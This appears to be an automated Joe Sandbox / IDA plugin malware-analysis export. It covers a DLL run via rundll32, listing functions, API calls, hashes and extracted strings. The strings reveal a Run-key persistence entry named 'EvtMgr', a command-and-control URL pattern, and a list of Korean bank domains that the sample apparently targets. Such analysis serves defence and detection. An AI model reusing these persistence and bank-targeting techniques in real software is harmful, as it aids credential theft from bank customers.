Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
API String ID: 3631164735-4205529783
Opcode ID: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
Instruction ID: 925e2da293242ab0c133c8592058369d05a2f9f499b66df2af7b6b931c45f916
Opcode Fuzzy Hash: 371d1544536f455d4ff2881a43cd085a9ecfe5f63921b749fa4ab69506bf8e29
Instruction Fuzzy Hash: 42E09275D10060A3F912B760ACCDADE3A21D78A795F074130F709E5156DF34CAD182B2

Function 1000F870 Relevance: 12.2, APIs: 8, Instructions: 169fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F8EB
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F90B
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F922
SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FEC7), ref: 1000F92B
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F93C
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F95C
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F96D

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-0
Opcode ID: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
Instruction ID: 75170083ee676786804825bfb6193be50822de76c0b42b9061a3e677b9cbe5b9
Opcode Fuzzy Hash: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
Instruction Fuzzy Hash: C851BFB1A04305AFF314CE94CC81FBBB7E4EF88784F10891CF68597684EAB4E9059B56

Function 1000A7D0 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 1000A8E4
6D7C2C70.MFC42(?), ref: 1000A8FA
InterlockedDecrement.KERNEL32(?), ref: 1000A918
6D7C2C70.MFC42(?), ref: 1000A92E
InterlockedIncrement.KERNEL32(?), ref: 1000A965
InterlockedDecrement.KERNEL32(?), ref: 1000A977
6D7C2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A99A
6D7C2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A9A3

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
Instruction ID: 3093974cb4f3d434be5fdbb974d372fcb86c240b2bae65a57b53355a280814b6
Opcode Fuzzy Hash: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
Instruction Fuzzy Hash: BE51B0B2A043529BE710DF658885A0EB7E4FB85690F424A2DF485D7205D734EDC5CB92

Function 100090E0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 91stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 10009105

Strings

%s/joy.asp?sid=%s, xrefs: 100091F0
%s|NULL|%s|%s, xrefs: 100091CB
NULL, xrefs: 10009100, 100091E4
09121307, xrefs: 100091B8
http://, xrefs: 100090FB
ECF4BB82F7E0, xrefs: 1000915E, 100091BF

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: strstr
String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$09121307$ECF4BB82F7E0$NULL$http://
API String ID: 1392478783-3870198355
Opcode ID: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
Instruction ID: ecfe1f19982070fc907945bea6b76d3382d22d52cdee0c44685c771b8a3fb10f
Opcode Fuzzy Hash: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
Instruction Fuzzy Hash: 91318F756047416BE724CB78CC01BEBB6D5EBC8344F44893CB74A8A285EF78E544C752

Function 10009000 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 10004B10: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F

Part of subcall function 10004C20: RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D

wsprintfA.USER32 ref: 10009097

Part of subcall function 10004CC0: RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE

Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,771B0F00), ref: 10004C65

Strings

EvtMgr, xrefs: 100090B7
c:\windows\SysWOW64\rundll32.exe, xrefs: 10009088
U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10009056
c:\ijbbn\gduol.dll, xrefs: 1000902F, 10009083
%s "%s",init, xrefs: 10009091
REG_SZ, xrefs: 1000904F

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreateNamePathShortValuewsprintf
String ID: %s "%s",init$EvtMgr$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$c:\ijbbn\gduol.dll$c:\windows\SysWOW64\rundll32.exe
API String ID: 2251888957-1430838553
Opcode ID: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
Instruction ID: 555e9edd79d20669cd6279b5f68c84e268027a48e8a655114ccd52f9ce3fa163
Opcode Fuzzy Hash: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
Instruction Fuzzy Hash: EF11ECB56442447BF354C228DC42FEB7698EB84340F800D28B745AA182EBF5E68882A7

Function 1000FA40 Relevance: 7.6, APIs: 5, Instructions: 138fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,75A38400,00000000,10010D59), ref: 1000FA95
CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,75A38400,00000000,10010D59), ref: 1000FAD6

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
Instruction ID: 308ac7dc05e7744f4e081a0bdb9278c18c1066b528d8c71e9578729df1ac5f0e
Opcode Fuzzy Hash: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
Instruction Fuzzy Hash: ED416AB26057419FE320CF29D884B5BB7ECEB943A9F108A3FF295C6940D370D8959B60

Function 100065E0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 1000663D
6D7C2C70.MFC42(00000000), ref: 1000666E
ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 10006697
6D7C2C70.MFC42(00000000), ref: 100066E2
CloseHandle.KERNEL32(00000000), ref: 100066F1

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseHandleMemoryProcessQueryReadVirtual
String ID:
API String ID: 1621033003-0
Opcode ID: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
Instruction ID: 86ba632d18ad3737237f260a16107ce2d7cf70f613dcfd362d55f89863a9b285
Opcode Fuzzy Hash: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
Instruction Fuzzy Hash: DB31BE717043529BE710CF14CC81A2BB3EAFB8A394F10852DF9809B245DB71ED46CB92

Function 10010E90 Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
Instruction ID: bb61c64e4c2e60018887cf4b21b2b77a56d021ed7f9f06e12eb8ae260fd69302
Opcode Fuzzy Hash: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
Instruction Fuzzy Hash: B90140F5B102158BEB60DF199982B0772E8FF08254F44447AF986CFA05EBB5F884CB52

Function 1000A070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(00000008), ref: 1000A18B
6D7C2C70.MFC42(?,?,?,ROOT\CIMV2), ref: 1000A1AE
6D7C2C70.MFC42(00000000,?,?,ROOT\CIMV2), ref: 1000A1B7

Strings

Win32_NetworkAdapterConfiguration, xrefs: 1000A08B

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DecrementInterlocked
String ID: Win32_NetworkAdapterConfiguration
API String ID: 3448037634-4052814535
Opcode ID: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
Instruction ID: 49a93a9e5889f4a4d7e19c6da1a56bba55ab2360c9dac4e16cdcecec2b112754
Opcode Fuzzy Hash: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
Instruction Fuzzy Hash: 1541C271A006158FE720DF18C88099AF3E6FB86684F248B19F855DB618E775EDC5CB81

Function 1000A200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(00000008), ref: 1000A20E
6D7C2C70.MFC42(?), ref: 1000A231
6D7C2C70.MFC42(00000000), ref: 1000A23A

Strings

Win32_NetworkAdapterConfiguration, xrefs: 1000A201

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: DecrementInterlocked
String ID: Win32_NetworkAdapterConfiguration
API String ID: 3448037634-4052814535
Opcode ID: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
Instruction ID: c28a89dc488e9a731896744f18f44f90fe9456c4448bec02802ad89f904d7290
Opcode Fuzzy Hash: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
Instruction Fuzzy Hash: 5FF065B6A0122157F660CF29AC45B4773DCEF46AE0B024539FC45DB208E775EDC1CA90

Function 100061F0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON

Download Yara Rule

APIs

strchr.MSVCRT ref: 10006246
strchr.MSVCRT ref: 10006310

Strings

, xrefs: 10006294
www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 10006211

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: strchr
String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
API String ID: 2830005266-1486078621
Opcode ID: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
Instruction ID: 22f4c21b83fa130e3717f09086c4acdffd80da0c0eff8554752984f014423e24
Opcode Fuzzy Hash: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
Instruction Fuzzy Hash: 9431A136604A081B972CC978985566B7AC3FBC4270FA5073DFA6B872C0DEF59E488281

Function 10010C90 Relevance: 6.1, APIs: 4, Instructions: 122COMMON

Download Yara Rule

APIs

6D7C2C70.MFC42(?), ref: 10010D6E
6D7C2C70.MFC42(?), ref: 10010D81
6D7C2C70.MFC42(?), ref: 10010D94
6D7C2C70.MFC42(00000000), ref: 10010DA0

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
Instruction ID: 76e20ac30a4a5d55d19c4aae950d6c9da367577159c72b0c1becef77eded0a0e
Opcode Fuzzy Hash: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
Instruction Fuzzy Hash: 5441C6F5A043489FCB64CF69988155ABBD0FB48220F94863EF9998B741D7B4E984CB42

Function 1000FE60 Relevance: 6.1, APIs: 4, Instructions: 114timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FEA9
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FED6
GetLocalTime.KERNEL32(?), ref: 1000FF10
SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FF20

Part of subcall function 1000F870: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID:
API String ID: 3986731826-0
Opcode ID: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
Instruction ID: ff97dbb23fa899d1f5120cfb08b873e3bb9ee6e36dd1778d440c9f7421c03229
Opcode Fuzzy Hash: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
Instruction Fuzzy Hash: A54182B1504B459FE310DF29C88096BF7E8FF89354F408A2EF59A83A51D771E909CB61

Function 10011725 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 10011738
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,00000000,00000000,10005F05,00000000), ref: 10011764
GetLastError.KERNEL32 ref: 10011774
GetLastError.KERNEL32 ref: 1001177A

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWidewcslen
String ID:
API String ID: 4237787585-0
Opcode ID: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
Instruction ID: a60b9fdcdbd7bba2f34e03c5dbd801d92a7e0330a45912f01037cd33475d2502
Opcode Fuzzy Hash: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
Instruction Fuzzy Hash: 02F0227620815ABDE224E6764C88DAB77ECDB852F87124638F514DE2C2E834EC81C2B0

Function 1000C800 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
Instruction ID: 31ee9fb48a3bb8c59739104f7274127136238450a65740f9f2d1a36a531c8075
Opcode Fuzzy Hash: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
Instruction Fuzzy Hash: FE0167B5A107154BE791CB2CD881F86B3D8EF40298F14403BF8459B715EB74F981CB96

Function 10004FF0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,771B0F00), ref: 10004FFD
TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
CloseHandle.KERNEL32(00000000), ref: 10005017
CloseHandle.KERNEL32(00000000), ref: 10005024

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: CloseHandleProcess$OpenTerminate
String ID:
API String ID: 6823918-0
Opcode ID: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
Instruction ID: 5de784d7574f9188aa6451a23a921ffbe079856f50babf4c989d878cd4bace46
Opcode Fuzzy Hash: ba73f2dd624f0828aa206dd07c4a16fe15200f4358f6e993a6f0722e7fc0aad8
Instruction Fuzzy Hash: 5CE0C2713012306FF6625734AC4CBAF36D4EF0CB52F024200FA06D5186D670CC91C6E1

Function 10005410 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 10005484
strrchr.MSVCRT ref: 100054D1

Strings

123, xrefs: 10005474

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: strrchr
String ID: 123
API String ID: 3418686817-2286445522
Opcode ID: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
Instruction ID: 91c88f2fdba39316f7f8c12ec317d5d5c799cc6de1d8f02641f729906415f28d
Opcode Fuzzy Hash: 237b865c981e04fbe9b07c6cb26367ff6a21c7b05088142f919ac67509ad86a0
Instruction Fuzzy Hash: 7B218CB52042042BF314C238AC46BBB3BC4DB80365F54062DFA169B1D2EDBBEA898255

Function 100116B0 Relevance: 5.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,00000000,00000000,10009F7F,?,Win32_NetworkAdapterConfiguration), ref: 100116C2
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000001), ref: 100116E9
GetLastError.KERNEL32(?,00000001), ref: 100116F9
GetLastError.KERNEL32(?,00000001), ref: 100116FF

Memory Dump Source

Source File: 0000000B.00000002.3751486928.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.3751456663.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751522529.0000000010012000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.000000001001E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.3751565251.0000000010020000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLast$ByteCharMultiWidelstrlen
